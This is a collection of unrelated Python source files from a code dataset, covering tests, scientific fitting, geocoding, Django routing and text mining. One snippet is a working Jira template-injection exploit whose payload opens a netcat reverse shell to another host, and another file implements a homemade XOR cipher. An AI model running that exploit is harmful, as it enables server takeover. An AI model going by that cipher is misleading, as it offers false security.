    b.update(keys)
    a_cpy = a.copy()
    self.assertTrue(a == b)
    self.assertFalse(a != b)
    self.assertTrue(a == a_cpy)
    a.clear()
    self.assertTrue(a != b)
    self.assertFalse(a == b)
    # Refilling with the same pairs restores equality.
    for k, v in keys:
        a[k] = v
    self.assertTrue(a == b)
    self.assertFalse(a != b)
    b.clear()
    b.update(dict(keys))
    self.assertTrue(a == b)
    self.assertFalse(a != b)
    del b['a']
    self.assertTrue(a != b)
    self.assertFalse(a == b)
    # Same keys but one differing value -> unequal.
    b['a'] = a['a'] + 1
    self.assertTrue(a != b)
    self.assertFalse(a == b)
    b['a'] = a['a']
    self.assertTrue(a == b)
    self.assertFalse(a != b)
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
| StarcoderdataPython |
4916224 | # -*- coding: utf-8 -*-
import numpy
import mab.gd.logging as logging
logger = logging.getLogger("gd.optimize.fitting")
from kaplot import *
class Fitting(object):
    """Fit a 1-D distribution model to data and visualise the result.

    Python 2 code.  Relies on kaplot's star-imported plotting helpers
    (mozaic, histogram, graph, select, vline, draw, arange, exp, box).
    `fitter` supplies the model and the fit; `data` is a lazy-loading
    container whose attributes `xattr`/`sigma_xattr` hold the samples
    and their per-sample uncertainties.
    """
    def __init__(self, fitter, data, xattr, sigma_xattr, filename):
        # filename: where the fitted parameter vector is (numpy-)saved.
        self.fitter = fitter
        self.data = data
        self.xattr = xattr
        self.sigma_xattr = sigma_xattr
        self.filename = filename
    def run(self, args, opts, scope):
        """Fit (or reload) the model, then plot data vs. model and a
        bootstrap distribution of the total log-likelihood."""
        obj = self.data.load()
        # Keep an untouched alias (xtest): `x` is reused as a loop
        # variable further down.
        xtest = x = getattr(obj, self.xattr)
        sigma_x = getattr(obj, self.sigma_xattr)
        print x
        print sigma_x
        #dsa
        model = self.fitter.get_model()
        if 1:  # fit branch; flip to 0 to reload a previous fit instead
            self.fitter.fit(x, sigma_x)
            self.x = [param.get() for param in model.parameters]
            for param in model.parameters:
                print param.name, param.get()
            if 0:  # debugging: per-sample likelihoods, break on NaN
                for x, e in zip(x, sigma_x):
                    y = model.logL(x, e)
                    print y, x, e
                    if numpy.isnan(y):
                        import pdb; pdb.set_trace()
            print "x =", self.x
            self.save()
        else:
            self.load()
        # Plot range for the histogram/model overlay.
        xmin = -200
        xmax = 300
        mozaic(2,1,box)
        histogram(x, binwidth=2, datamin=xmin, datamax=xmax, normalize=True)
        xs = arange(xmin, xmax, 0.5)
        # Model density evaluated with zero measurement error.
        logy = [model.logL(x, 0) for x in xs]
        graph(xs, exp(logy), color="red")
        select(1,0)
        # Bootstrap: M resampled datasets of size N give the expected
        # distribution of the total logL; the green line marks the data.
        N = len(sigma_x)
        M = 10000
        logLs = []
        for j in range(M):
            #print j, M
            #samples_new = array([model.sample() for i in range(len(samples))])
            logL = sum([model.logL(model.sample(), sigma_x[i]) for i in range(N)])
            logLs.append(logL)
        histogram(logLs, bincount=100, normalize=True)#, datamin=datamin, datamax=datamax, )
        logL = sum([model.logL(xtest[i], sigma_x[i]) for i in range(N)])
        vline(logL, color="green")
        print logL
        draw()
    def load(self):
        """Restore fitted parameter values from self.filename."""
        logger.info("loading fit parameters from: " + self.filename)
        values = numpy.load(self.filename)
        for param, value in zip(self.fitter.get_model().parameters, values):
            #print param, param.name, value
            param.set(value)
        #self.fitter.get_model().parameters[-1].set(1)
        #self.fitter.get_model().parameters[-1].set(5)
        #param.set(0.4)
    def save(self):
        """Persist the fitted parameter vector self.x to self.filename."""
        logger.info("saving fit parameters to: " + self.filename)
        values = numpy.save(self.filename, self.x)
| StarcoderdataPython |
6402001 | <filename>parsl/tests/integration/test_channels/test_ssh_file_transport.py<gh_stars>100-1000
import parsl
from parsl.channels.ssh.ssh import SSHChannel as SSH
def connect_and_list(hostname, username):
    # Open an SSH channel, run a trivial remote command, and return its
    # stdout (the exit code and stderr are discarded).
    conn = SSH(hostname, username=username)
    ec, out, err = conn.execute_wait("echo $HOSTNAME")
    conn.close()
    return out
def test_push(conn, fname="test001.txt"):
    # Create a small local file, push it to the remote /tmp, then list it
    # remotely to confirm the transfer; prints the ls result.
    with open(fname, 'w') as f:
        f.write("Hello from parsl.ssh testing\n")
    conn.push_file(fname, "/tmp")
    ec, out, err = conn.execute_wait("ls /tmp/{0}".format(fname))
    print(ec, out, err)
def test_pull(conn, fname="test001.txt"):
    # Pull the remote file back into the local directory "foo" and echo
    # its contents.
    # NOTE(review): assumes ./foo exists or that pull_file creates it --
    # confirm against SSHChannel.pull_file; otherwise the open() fails.
    local = "foo"
    conn.pull_file("/tmp/{0}".format(fname), local)
    with open("{0}/{1}".format(local, fname), 'r') as f:
        print(f.readlines())
if __name__ == "__main__":
    # Manual integration test: push then pull against a hard-coded host.
    parsl.set_stream_logger()
    # This is for testing
    conn = SSH("midway.rcc.uchicago.edu", username="yadunand")
    test_push(conn)
    test_pull(conn)
    conn.close()
| StarcoderdataPython |
9759871 | import os
from configobj import ConfigObj
# Package root: two directory levels above this module.
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# settings.conf is expected one level ABOVE the package root
# (three levels up from this file).
config = ConfigObj(
    os.path.join(os.path.dirname(BASE_DIR), 'settings.conf')
)
| StarcoderdataPython |
6459452 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import auth_oauth
import ir_config_parameter
import res_config
import res_users
| StarcoderdataPython |
8186394 | import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from scipy.optimize import minimize
from scipy.interpolate import interp1d
import warnings
# Import data file
# Column 1 = time (t)
# Column 2 = input (u)
# Column 3 = output (yp)
# Load the step-test data and take the first row as the initial
# steady state (u0, y0); xp0 is the initial ODE state [y, y'].
data = np.loadtxt('data_step_test.csv',delimiter=',')
u0 = data[0,1]
y0 = data[0,2]
xp0 = [y0,0.0]
t = data[:,0].T
u = data[:,1].T
yp = data[:,2].T
# specify number of steps
ns = len(t)
delta_t = t[1]-t[0]
# create linear interpolation of the u data versus time
uf = interp1d(t,u)
def sopdt(x,t,uf,Kp,taus,zeta,thetap):
    """Right-hand side of the SOPDT model for scipy.integrate.odeint.

    Kp     = process gain
    taus   = second order time constant
    zeta   = damping factor
    thetap = dead time
    Model: taus^2 y'' + 2*zeta*taus*y' + y = Kp*(u(t-thetap) - u0)

    x is the state [y, y']; uf interpolates the measured input u(t).
    Uses module-level u0/y0 (initial steady state) as deviation origin.
    """
    # time-shift u by the dead time; before t = thetap the process
    # still sees the initial input
    try:
        if (t-thetap) <= 0:
            um = uf(0.0)
        else:
            um = uf(t-thetap)
    except Exception:
        # interp1d raises ValueError outside its time range; fall back
        # to the initial input.  (Was a bare `except:`, which also
        # swallowed KeyboardInterrupt/SystemExit.)
        um = u0
    # two states (y and y'), in deviation variables around (u0, y0)
    y = x[0] - y0
    dydt = x[1]
    dy2dt2 = (-2.0*zeta*taus*dydt - y + Kp*(um-u0))/taus**2
    return [dydt,dy2dt2]
# simulate model with x = [Kp, taus, zeta, thetap]
def sim_model(x):
    """Integrate the SOPDT model over the measured time grid and return
    the simulated output y at every sample.

    Uses module-level ns, delta_t, xp0 and uf; integrates one sample
    interval at a time so the interpolated input stays in range.
    """
    # input arguments
    Kp = x[0]
    taus = x[1]
    zeta = x[2]
    thetap = x[3]
    # storage for model values
    xm = np.zeros((ns,2)) # model
    # initial condition
    xm[0] = xp0
    # loop through time steps
    for i in range(0,ns-1):
        ts = [delta_t*i,delta_t*(i+1)]
        inputs = (uf,Kp,taus,zeta,thetap)
        # turn off warnings
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            # integrate SOPDT model
            x = odeint(sopdt,xm[i],ts,args=inputs)
        xm[i+1] = x[-1]
    y = xm[:,0]
    return y
# define objective
def objective(x):
    """Sum of squared errors between the SOPDT simulation for parameter
    vector x and the measured response yp (module-level)."""
    ym = sim_model(x)
    return sum(((ym[i] - yp[i]) ** 2 for i in range(len(ym))), 0.0)
# initial guesses
p0 = np.zeros(4)
p0[0] = 0.45 # Kp
p0[1] = 100.0 # taup
p0[2] = 1.5 # zeta
p0[3] = 0.0 # thetap
# show initial objective
print('Initial SSE Objective: ' + str(objective(p0)))
# optimize Kp, taus, zeta, thetap
# bounds on variables
# NOTE(review): no_bnd and low_bnd are defined but never used below.
no_bnd = (-1.0e10, 1.0e10)
low_bnd = (0.01, 1.0e10)
Kp_bnd = (0.0,1.0)
tau_bnd = (20.0,200.0)
zeta_bnd = (1.0,2.0)
# dead time pinned to zero by an equal-bounds pair
dead_time = (0.0,0.0)
bnds = (Kp_bnd, tau_bnd, zeta_bnd, dead_time)
solution = minimize(objective,p0,method='SLSQP',bounds=bnds)
p = solution.x
# show final objective
print('Final SSE Objective: ' + str(objective(p)))
print('Kp: ' + str(p[0]))
print('taup: ' + str(p[1]))
print('zeta: ' + str(p[2]))
print('thetap: ' + str(p[3]))
# calculate model with updated parameters
ym1 = sim_model(p0)
ym2 = sim_model(p)
# plot results: output comparison on top, input data below
plt.figure()
plt.subplot(2,1,1)
plt.plot(t,ym1,'b-',linewidth=2,label='Initial Guess')
plt.plot(t,ym2,'r--',linewidth=3,label='Optimized SOPDT')
plt.plot(t,yp,'k--',linewidth=2,label='Process Data')
plt.ylabel('Output')
plt.legend(loc='best')
plt.subplot(2,1,2)
plt.plot(t,u,'bx-',linewidth=2)
plt.plot(t,uf(t),'r--',linewidth=3)
plt.legend(['Measured','Interpolated'],loc='best')
plt.ylabel('Input Data')
plt.savefig('results.png')
plt.show()
| StarcoderdataPython |
9695412 | import base64
from Crypto import Random
import json
class SpinnerException(Exception):
    """Raised for invalid Spinner construction or encrypt/decrypt input."""
    pass
class Spinner(object):
    """Toy symmetric cipher driven by a matrix of random XOR keys.

    _keys holds `num_iterations` rounds; each round has 256 keys (one per
    possible byte value), each `num_bytes` long.  Each step XORs the
    whole message with the key selected by the byte at the current
    position, then writes that byte back so decryption can re-select the
    same key in reverse order.
    NOTE(review): homegrown scheme -- do not rely on it for real security.
    """
    def __init__(self, key_matrix):
        self._keys = key_matrix
        # check key matrix is well formed
        num_iterations = len(self._keys)
        assert num_iterations > 0
        num_bytes = len(self._keys[0][0])
        assert num_bytes > 0
        for local_keys in self._keys:
            assert len(local_keys) == 256
            for key in local_keys:
                assert len(key) == num_bytes

    @classmethod
    def generate(cls, num_bytes=256, num_iterations=10):
        """Create a Spinner with fresh random keys (Crypto.Random)."""
        # explicitly check inputs
        if not isinstance(num_bytes, int):
            raise SpinnerException('Number of bytes must be an integer.')
        if not isinstance(num_iterations, int):
            raise SpinnerException('Number of iterations must be an integer.')
        if num_bytes <= 0:
            raise SpinnerException('Number of bytes must be positive.')
        if num_iterations <= 0:
            raise SpinnerException('Number of iterations must be positive.')
        # create matrix of new keys
        m = []
        for i in range(num_iterations):
            n = []
            for c in range(256):
                n.append(bytearray(Random.get_random_bytes(num_bytes)))
            m.append(n)
        # create and return object
        return cls(m)

    @classmethod
    def loads(cls, s):
        """Rebuild a Spinner from the JSON produced by dumps().

        NOTE(review): shape validation uses `assert`, which is stripped
        under `python -O`.
        """
        # load json string into dictionary
        j = json.loads(s)
        # verify dictionary model, build matrix of keys
        m = []
        assert 'keys' in j
        assert isinstance(j['keys'], list)
        num_iters = len(j['keys'])
        assert num_iters > 0
        first = True
        num_bytes = 0
        for i in j['keys']:
            assert isinstance(i, list)
            assert len(i) == 256
            m_local = []
            for c in i:
                b = bytearray(base64.b64decode(c))
                if first:
                    # first key fixes num_bytes; all others must match
                    num_bytes = len(b)
                    assert num_bytes > 0
                    first = False
                else:
                    assert len(b) == num_bytes
                m_local.append(b)
            m.append(m_local)
        # create and return object
        return cls(m)

    def dumps(self):
        """Serialize the key matrix as JSON with base64-encoded keys.

        Built by hand (not json.dumps); must stay parseable by loads().
        """
        s = '{\n    "keys": [\n'
        outer_first = True
        for local_keys in self._keys:
            if not outer_first:
                s += ',\n'
            outer_first = False
            s += '        [\n'
            inner_first = True
            for key in local_keys:
                if not inner_first:
                    s += ',\n'
                inner_first = False
                s += '            "%s"' % base64.b64encode(key).decode('utf-8')
            s += '\n        ]'
        s += '\n    ]\n}'
        return s

    @property
    def num_bytes(self):
        # Length of every key == maximum message length.
        return len(self._keys[0][0])

    @property
    def num_iterations(self):
        # Number of encryption rounds.
        return len(self._keys)

    def encrypt(self, plaintext):
        """Encrypt a bytearray of at most num_bytes; returns a new
        bytearray (the caller's buffer is not modified -- xor() always
        allocates a fresh result before the in-place byte restore)."""
        # explicitly check plaintext before use
        if not isinstance(plaintext, bytearray):
            raise SpinnerException('Plaintext must be a bytearray.')
        num_pt_bytes = len(plaintext)
        if num_pt_bytes <= 0:
            raise SpinnerException('Plaintext is zero length.')
        if num_pt_bytes > self.num_bytes:
            raise SpinnerException('Plaintext is too long.')
        # do encryption
        ct = plaintext
        num_iterations = self.num_iterations
        for itr in range(num_iterations):
            for pos in range(num_pt_bytes):
                # XOR with the key selected by the byte at pos, then
                # restore that byte so decrypt can pick the same key.
                b = ct[pos]
                assert (b >= 0 and b <= 255)
                ct = self.xor(ct, self._keys[itr][b])
                ct[pos] = b
        return ct

    def decrypt(self, ciphertext):
        """Invert encrypt() by replaying rounds and positions in reverse."""
        # explicitly check ciphertext before use
        if not isinstance(ciphertext, bytearray):
            raise SpinnerException('Ciphertext must be a bytearray.')
        num_ct_bytes = len(ciphertext)
        if num_ct_bytes <= 0:
            raise SpinnerException('Ciphertext is zero length.')
        if num_ct_bytes > self.num_bytes:
            raise SpinnerException('Ciphertext is too long.')
        # do decryption
        pt = ciphertext
        num_iterations = self.num_iterations
        for itr in range(num_iterations-1, -1, -1):
            for pos in range(num_ct_bytes-1, -1, -1):
                pt[pos] is not None  # (no-op removed -- see below)
                b = pt[pos]
                assert (b >= 0 and b <= 255)
                pt = self.xor(pt, self._keys[itr][b])
                pt[pos] = b
        return pt

    @staticmethod
    def xor(a, b):
        """Bytewise a XOR b truncated to len(a); returns a NEW bytearray."""
        assert isinstance(a, bytearray)
        assert isinstance(b, bytearray)
        num_bytes = len(a)
        assert num_bytes <= len(b)
        ret = bytearray()
        for i in range(num_bytes):
            ret.append(a[i] ^ b[i])
        return ret
| StarcoderdataPython |
11393073 | """
:class:`.GoogleV3` is the Google Maps V3 geocoder.
"""
from warnings import warn
import base64
import hashlib
import hmac
from geopy.compat import urlencode
from geopy.geocoders.base import Geocoder, DEFAULT_TIMEOUT, DEFAULT_SCHEME
from geopy.util import logger
from geopy.exc import GeocoderQueryError, GeocoderQuotaExceeded, ConfigurationError
class GoogleV3(Geocoder):  # pylint: disable=R0902
    """
    Geocoder using the Google Maps v3 API. Documentation at:
        https://developers.google.com/maps/documentation/geocoding/
    """

    def __init__(self, domain='maps.googleapis.com', scheme=DEFAULT_SCHEME,  # pylint: disable=R0913
                 client_id=None, secret_key=None, timeout=DEFAULT_TIMEOUT,
                 proxies=None, protocol=None):
        """
        Initialize a customized Google geocoder.

        API authentication is only required for Google Maps Premier customers.

        :param string domain: Should be the localized Google Maps domain to
            connect to. The default is 'maps.googleapis.com', but if you're
            geocoding address in the UK (for example), you may want to set it
            to 'maps.google.co.uk' to properly bias results.

        :param string scheme: Use 'https' or 'http' as the API URL's scheme.
            Default is https. Note that SSL connections' certificates are not
            verified.

            .. versionadded:: 0.97

        :param string protocol: Deprecated version of `scheme` argument.
            Override scheme, if present.

        :param string client_id: If using premier, the account client id.

        :param string secret_key: If using premier, the account secret key.

        :param dict proxies: If specified, routes this geocoder's requests
            through the specified proxy. E.g., {"https": "192.0.2.0"}. For
            more information, see documentation on
            :class:`urllib2.ProxyHandler`.

            .. versionadded:: 0.96
        """
        if protocol:  # pragma: no cover
            # BUGFIX: the two implicitly-concatenated literals previously
            # rendered as "to beremoved" (missing space).
            warn('protocol argument is deprecated in favor of scheme, to be '
                 'removed in 0.98')
        scheme = protocol or scheme
        super(GoogleV3, self).__init__(scheme=scheme, timeout=timeout, proxies=proxies)
        # Premier auth requires BOTH credentials; providing only one is a
        # configuration error.
        if client_id and not secret_key:
            raise ConfigurationError('Must provide secret_key with client_id.')
        if secret_key and not client_id:
            raise ConfigurationError('Must provide client_id with secret_key.')

        self.domain = domain.strip('/')
        self.scheme = scheme
        self.doc = {}

        if client_id and secret_key:
            self.premier = True
            self.client_id = client_id
            self.secret_key = secret_key
        else:
            self.premier = False
            self.client_id = None
            self.secret_key = None

        self.api = '%s://%s/maps/api/geocode/json' % (self.scheme, self.domain)

    def _get_signed_url(self, params):
        """
        Returns a Premier account signed url. Docs on signature:
            https://developers.google.com/maps/documentation/business/webservices/auth#digital_signatures
        """
        params['client'] = self.client_id
        path = "?".join(('/maps/api/geocode/json', urlencode(params)))
        # HMAC-SHA1 over the path+query, keyed with the url-safe-base64
        # decoded secret, per Google's signing spec.
        signature = hmac.new(
            base64.urlsafe_b64decode(self.secret_key),
            path.encode('utf-8'),
            hashlib.sha1
        )
        signature = base64.urlsafe_b64encode(signature.digest()).decode('utf-8')
        return '%s://%s%s&signature=%s' % (self.scheme, self.domain, path, signature)

    @staticmethod
    def _format_components_param(components):
        """
        Format the components dict to something Google understands.
        """
        return '|'.join(['%s:%s' % (a, b) for a, b in components.items()])

    def geocode(self, query, bounds=None, region=None,  # pylint: disable=W0221,R0913
                components=None,
                language=None, sensor=False, exactly_one=True, timeout=None):
        """
        Geocode a location query.

        :param string query: The address or query you wish to geocode.

        :param bounds: The bounding box of the viewport within which
            to bias geocode results more prominently.
        :type bounds: list or tuple

        :param string region: The region code, specified as a ccTLD
            ("top-level domain") two-character value.

        :param dict components: Restricts to an area. Can use any combination
            of: route, locality, administrative_area, postal_code, country.

        :param string language: The language in which to return results.

        :param bool sensor: Whether the geocoding request comes from a
            device with a location sensor.

        :param bool exactly_one: Return one result or a list of results, if
            available.

        :param int timeout: Time, in seconds, to wait for the geocoding service
            to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
            exception. Set this only if you wish to override, on this call only,
            the value set during the geocoder's initialization.

            .. versionadded:: 0.97
        """
        params = {
            'address': self.format_string % query,
            'sensor': str(sensor).lower()
        }
        if bounds:
            params['bounds'] = bounds
        if region:
            params['region'] = region
        if components:
            params['components'] = self._format_components_param(components)
        if language:
            params['language'] = language

        if self.premier is False:
            url = "?".join((self.api, urlencode(params)))
        else:
            url = self._get_signed_url(params)

        logger.debug("%s.geocode: %s", self.__class__.__name__, url)
        return self._parse_json(self._call_geocoder(url, timeout=timeout), exactly_one)

    def reverse(self, query, language=None,  # pylint: disable=W0221,R0913
                sensor=False, exactly_one=False, timeout=None):
        """
        Given a point, find an address.

        :param query: The coordinates for which you wish to obtain the
            closest human-readable addresses.
        :type query: :class:`geopy.point.Point`, list or tuple of (latitude,
            longitude), or string as "%(latitude)s, %(longitude)s"

        :param string language: The language in which to return results.

        :param boolean sensor: Whether the geocoding request comes from a
            device with a location sensor.

        :param boolean exactly_one: Return one result or a list of results, if
            available.

        :param int timeout: Time, in seconds, to wait for the geocoding service
            to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
            exception.

            .. versionadded:: 0.97
        """
        params = {
            'latlng': self._coerce_point_to_string(query),
            'sensor': str(sensor).lower()
        }
        if language:
            params['language'] = language

        if not self.premier:
            url = "?".join((self.api, urlencode(params)))
        else:
            url = self._get_signed_url(params)

        logger.debug("%s.reverse: %s", self.__class__.__name__, url)
        return self._parse_json(self._call_geocoder(url, timeout=timeout), exactly_one)

    def _parse_json(self, page, exactly_one=True):
        '''Returns location, (latitude, longitude) from json feed.'''
        places = page.get('results', [])
        if not len(places):
            # No results: raise on error statuses, return None otherwise.
            self._check_status(page.get('status'))
            return None

        def parse_place(place):
            '''Get the location, lat, lng from a single json place.'''
            location = place.get('formatted_address')
            latitude = place['geometry']['location']['lat']
            longitude = place['geometry']['location']['lng']
            return (location, (latitude, longitude))

        if exactly_one:
            return parse_place(places[0])
        else:
            return [parse_place(place) for place in places]

    @staticmethod
    def _check_status(status):
        """
        Validates error statuses.
        """
        if status == 'ZERO_RESULTS':
            # When there are no results, just return.
            return
        if status == 'OVER_QUERY_LIMIT':
            raise GeocoderQuotaExceeded(
                'The given key has gone over the requests limit in the 24'
                ' hour period or has submitted too many requests in too'
                ' short a period of time.'
            )
        elif status == 'REQUEST_DENIED':
            raise GeocoderQueryError(
                'Your request was denied.'
            )
        elif status == 'INVALID_REQUEST':
            raise GeocoderQueryError('Probably missing address or latlng.')
        else:
            raise GeocoderQueryError('Unknown error.')
| StarcoderdataPython |
3544843 | #!/usr/bin/python
import mechanize
url="http://jira-server:8080/secure/ContactAdministrators!default.jspa"
exploit="$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('nc -e /bin/bash jira-smtp 12345').waitFor()"
br = mechanize.Browser()
br.set_handle_robots(False)
br.open(url)
br.select_form(nr=1)
print br.form
br.form['from'] = "test@jira-smtp"
br.form['details'] = "test"
br.form['subject'] = exploit
br.submit()
| StarcoderdataPython |
6552001 |
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from core.views import *
# DRF router: one REST endpoint per registered ViewSet.
router = routers.DefaultRouter()
router.register('usuarios', UsuarioViewSet)
router.register('grupoVeiculos', Grupo_veiculoViewSet)
router.register('veiculos', VeiculoViewSet)
router.register('seguros', SeguroViewSet)
router.register('reservas', ReservaViewSet)
router.register('manutencao', ManutencaoViewSet)

# API at the site root, plus the admin and DRF's login/logout views.
urlpatterns = [
    path('', include(router.urls)),
    path('admin/', admin.site.urls),
    path('api-auth/', include('rest_framework.urls')),
]
| StarcoderdataPython |
4786 |
def solve(n, red, blue):
    """Compare the first n digits of `red` and `blue` position by position
    and print which side wins more positions ('RED', 'BLUE' or 'EQUAL')."""
    red_wins = 0
    blue_wins = 0
    for idx in range(n):
        r = int(red[idx])
        b = int(blue[idx])
        if r > b:
            red_wins += 1
        elif b > r:
            blue_wins += 1
    if red_wins > blue_wins:
        print('RED')
    elif blue_wins > red_wins:
        print('BLUE')
    else:
        print('EQUAL')
if __name__ == "__main__":
    # T test cases; each gives the digit count n, then the two digit strings.
    T = int(input())
    for t in range(T):
        n = int(input())
        red = input()
        blue = input()
        solve(n, red, blue)
3204918 | from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.shortcuts import render
from django.urls import reverse
from ..forms import UserProfileForm
from ..utilities import set_message_and_redirect, set_message
@login_required
def profile(request):
    """Display and process the user's profile and password-change forms.

    GET renders both forms pre-filled; POST dispatches on which submit
    button was pressed ("profile_submit" or "password_submit").
    """
    initial_data = {
        "first_name": request.user.first_name,
        "last_name": request.user.last_name,
        "email": request.user.email,
        "default_currency": request.user.userprofile.default_currency,
        "default_period": request.user.userprofile.default_period,
    }

    profile_form = UserProfileForm(initial=initial_data)
    password_form = PasswordChangeForm(user=request.user)

    # BUGFIX: check the HTTP method, not the POST dict -- `if request.POST:`
    # is falsy for a POST with an empty body and silently fell through.
    if request.method == "POST":
        if "profile_submit" in request.POST:
            profile_form = UserProfileForm(request.POST)

            if profile_form.is_valid():
                request.user.first_name = profile_form.cleaned_data["first_name"]
                request.user.last_name = profile_form.cleaned_data["last_name"]
                request.user.email = profile_form.cleaned_data["email"]
                # The username mirrors the e-mail address in this app.
                request.user.username = profile_form.cleaned_data["email"]
                request.user.save()

                request.user.userprofile.default_currency = profile_form.cleaned_data["default_currency"]
                request.user.userprofile.default_period = profile_form.cleaned_data["default_period"]
                request.user.userprofile.save()

                return set_message_and_redirect(request, "s|Your profile has been updated succesfully!", reverse("blackbook:profile"))
            else:
                set_message(request, "f|Your profile could not be saved. Please correct the errors below and try again.")

        if "password_submit" in request.POST:
            password_form = PasswordChangeForm(request.user, request.POST)

            if password_form.is_valid():
                password_form.save()
                # Keep the user logged in after the password change.
                update_session_auth_hash(request, request.user)

                return set_message_and_redirect(request, "s|Your password has been changed succesfully!", reverse("blackbook:profile"))
            else:
                set_message(request, "f|Your password could not be updated. Please correct the errors below and try again.")

    return render(request, "blackbook/profile.html", {"profile_form": profile_form, "password_form": password_form})
6700024 | <reponame>yag8009/office_test_team
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : yag8009
# @FileName : read_word
# @Time : 2020/6/13
import docx
import os,zipfile,shutil
def read_word(file_name):
    """Return the text of every paragraph in a .docx document as a list."""
    document = docx.Document(file_name)
    return [paragraph.text for paragraph in document.paragraphs]
def getimage(docdir):
    # Extract the embedded images of every .docx in docdir: a .docx is a
    # ZIP archive whose images live under word/media.
    # NOTE(review): uses Windows-style backslash paths and os.chdir as a
    # process-wide side effect; raises if a document has no word/media
    # folder (shutil.copytree source missing) -- confirm before reuse.
    os.chdir(docdir)
    dirlist = os.listdir(docdir)
    for i in dirlist:
        if i.endswith(".docx"):  # match .docx files
            docname = i.split(".")  # split the name on "." into a list
            os.rename(i,"%s.ZIP"%docname[0])  # rename to .ZIP so it opens as an archive
            f = zipfile.ZipFile("%s.ZIP"%docname[0], 'r')
            for file in f.namelist():
                if "word" in file:
                    f.extract(file)  # extract the archive's word/ folder
            f.close()
            oldimagedir = r"%s\word\media"%docdir  # the extracted image folder
            shutil.copytree(oldimagedir,"%s\%s"%(docdir,docname[0]))  # copy it to a dir named after the document
            os.rename("%s.ZIP" % docname[0],"%s.docx"% docname[0])  # restore the .docx extension
            shutil.rmtree("%s\word"%docdir)  # remove the extracted word/ folder
if __name__ == '__main__':
    # Smoke test against local sample data (hard-coded paths).
    doc = read_word('word_data//夜市摆地摊用什么收银软件和管理库存好.docx')
    print(doc) # 输出行数:1075
    getimage(r'E:\office_test_team\office_test_interface\spider_dxt_com\fubu_dxt\word_data')
| StarcoderdataPython |
def find_mod(path, dic):
    """Discover text patterns (left/right context pairs) around dictionary
    words in the text files under `path`.

    NOTE(review): relies on helpers read_dict / modified /
    some_little_modify defined elsewhere in the project -- confirm their
    normalization semantics before changing this.
    """
    file_list = os.listdir(path)
    word_list = read_dict(dic)
    word_count = {}
    # dict: key = discovered pattern, value = number of dictionary words
    # that matched it
    mod_list = []
    # patterns are kept as a list of (left_context, right_context) tuples
    word_match = {}
    # p / q: maximum left / right context lengths to try
    p = 5
    q = 5
    for file in file_list:
        with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
            txt_file = txt_fr.readlines()
            #txt_file = modified(txt_fr.read())
            for line in txt_file:
                line = modified(line)
                if len(line) > 0:
                    for word in word_list:
                        # every occurrence of the dictionary word in the line
                        loc_list = [w.start() for w in re.finditer(word, line)]
                        for loc in loc_list:
                            for i in range(1, (p+1)):
                                for j in range(1,(q+1)):
                                    if loc - i >= 0 and loc + len(word) + j <len(line):
                                        ext_word = line[loc - i: loc + len(word) + j]
                                        ext_wd = some_little_modify(ext_word)
                                        local_ind = ext_wd.index(some_little_modify(word))
                                        try:
                                            #mod = re.compile(ext_wd[:local_ind]+'(\S{%d})'%len(word)+ext_wd[local_ind+len(word):])
                                            mod = (ext_wd[:local_ind], ext_wd[local_ind+len(word):])
                                        except re.error:
                                            print (word + '\t\t' + ext_word + '\n')
                                        if mod not in mod_list:
                                            mod_list.append(mod)
                                            word_match[mod] = {word}
                                        else:
                                            word_match[mod].add(word)
    for mod in mod_list:
        word_count[mod] = len(word_match[mod])
    return mod_list, word_count, word_match
def find_word(path, mod_list, dic):
    """Use the discovered (left, right) context patterns to extract new
    words from the text files under `path`.

    Returns the set of extracted words not already in the dictionary,
    plus per-pattern match counts and match sets.
    """
    file_list = os.listdir(path)
    word_list = read_dict(dic)
    mod_count = {}
    # key = pattern, value = number of words it matched
    mod_match = {}
    # key = pattern, value = set of words it matched
    new_word = set()
    # the set of newly found words
    for mod in mod_list:
        word_set = set()
        for file in file_list:
            with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
                #txt_file = modified(txt_fr.read())
                txt_list = txt_fr.readlines()
                for line in txt_list:
                    line = modified(line)
                    # candidate word = text between an end of the left
                    # context and the next start of the right context
                    left_index = [w.end() for w in re.finditer(mod[0], line)]
                    right_index = [w.start() for w in re.finditer(mod[1], line)]
                    start = 0
                    i, j = 0, 0
                    for i in range(len(left_index)):
                        if start < len(right_index):
                            for j in range(start, len(right_index)):
                                if right_index[j] > left_index[i] and (i == len(left_index)-1 or right_index[j] <= left_index[i+1]):
                                    word = line[left_index[i]: right_index[j]]
                                    # cap candidate length at 9 characters
                                    if len(word) < 10:
                                        print (word)
                                        print (file)
                                        word_set.add(word)
                                    start += 1
                                    break
                                elif i < len(left_index) - 1 and right_index[j] > left_index[i+1]:
                                    break
                                else:
                                    start += 1
        #wor_set = wor_set.difference(set(word_list))
        num_extract = len(word_set)
        mod_count[mod] = num_extract
        mod_match[mod] = word_set
        new_word = new_word.union(word_set)
    # drop words already present in the dictionary
    new_word = new_word.difference(set(word_list))
    return new_word, mod_count, mod_match
# def find_word(path, mod_list, dic):
# """用发现的模式去发现文本中的新词"""
# file_list = os.listdir(path)
# word_list = read_dict(dic)
# mod_count = {}
# #键为发现的模式, 相应的值为匹配到的词的数目
# mod_match = {}
# #键为发现的模式, 相应的值为匹配到的词的集合
# new_word = set()
# #匹配到的新词的集合
# for mod in mod_list:
# wor_set = set()
# for file in file_list:
# with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
# txt_file = txt_fr.read()
# wor_set = wor_set.union(set(re.findall(mod, txt_file)))
# #wor_set = wor_set.difference(set(word_list))
# num_extract = len(wor_set)
# mod_count[mod] = num_extract
# mod_match[mod] = wor_set
# new_word = new_word.union(wor_set)
# new_word = new_word.difference(set(word_list))
# return new_word, mod_count, mod_match
# def find_mod(path, dic):
# """用字典中的词发现文本模式"""
# file_list = os.listdir(path)
# word_list = read_dict(dic)
